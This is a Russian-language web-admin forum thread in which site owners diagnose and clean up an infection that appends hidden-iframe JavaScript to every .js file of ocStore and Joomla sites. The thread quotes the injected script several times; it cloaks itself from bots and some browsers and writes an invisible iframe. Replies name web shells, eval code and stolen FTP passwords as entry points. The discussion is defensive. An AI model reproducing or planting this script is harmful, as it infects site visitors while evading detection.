[Решено? {joomla}] Взлом магазина *.js

[colaweb]

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

[Strelez]

На другой cms была такая проблема - во ВСЕ js-файлы (в самый конец) добавлялся, скажем так, некий код (не обязательно как у вас). Выяснилось: дыра FTP (а потому не храните пароли в клиентах). Лечение: либо чистка всех js-файлов, либо их замена + ОБЯЗАТЕЛЬНАЯ смена FTP-доступов (логин - пароль).

[Гість]

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

на вашем аккаунте случайно нет сайтов на джумле или дле?  Если есть, то ищите дыры там

[colaweb]

Как оказалось, вредоносный код во всех файлах *.js не только в ocStore, но и в других cms.

[Strelez]

 

на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там

Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал.

[Гість]

Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал.

 я бы мог конечно назвать и другие CMS , но боюсь , что не хватит места на форуме.. просто привел пример.. :-)

[Strelez]

Так ведь дело-то не в cms, а в способе и пути проникновения вредоносного кода, ну и "чистоте" своего компьютера, конечно же  :wink:

[colaweb]

1. Почистил все файлы *.js

2. Поменял все пароли

 

"Дырку" та и не нашел, посмотрю что завтра будет.

[colaweb]

1. Почистил все файлы *.js

2. Поменял все пароли

 

"Дырку" та и не нашел, посмотрю что завтра будет.

 

Не помогло. Опять во все *.js дописался вначале вредоносный код 

 

В файле ошибок появились записи:

2013-10-14 20:18:51 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:18:51 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:18:51 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106
2013-10-14 20:44:55 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:44:55 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:44:55 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106
2013-10-14 20:50:12 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:50:12 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:50:12 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106

Что делать?

[Thirdian]

Имхо, ищите шелл.

[Гість]

вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке?

в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут

[haykoar]

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой:

 

<Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$">

Deny from all

</Files>

Order allow,deny

Deny from all

 

Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем

Змінено 23 жовтня 2013 користувачем afwollis
unlinked

[Zeppelin]

для поиска заразы на хостинге хорошо подходит такой инструмент как

AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге

[Baco]

Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина.

[colaweb]

Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина.

 

Шеллы сидели в Joomle.

 

Почистил все файлы .php где был код с 

eval(..

Пока все тихо, ищу "дырку"

.

[Гість]

Шеллы сидели в Joomle.

 

Почистил все файлы .php где был код с 

eval(..

Пока все тихо, ищу "дырку"

.

вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера...

[Doktorsaitov]

ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику.

[Pavel555]

Тоже попалась эта зараза. Действовал так:

• удалил вредоносный код из всех .js
• в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php
• поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla
• удалил все найденные php

[Pavel555]

В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата?

[elitesmart]

А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными.

[chukcha]

Идей много, вплоть до анализа логов доступа.

Вам нужно лечить? или заниматься самолечением?

[andreyvebuiskii]

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

 

Может это поможет? Вирусдай (писал обзор тут).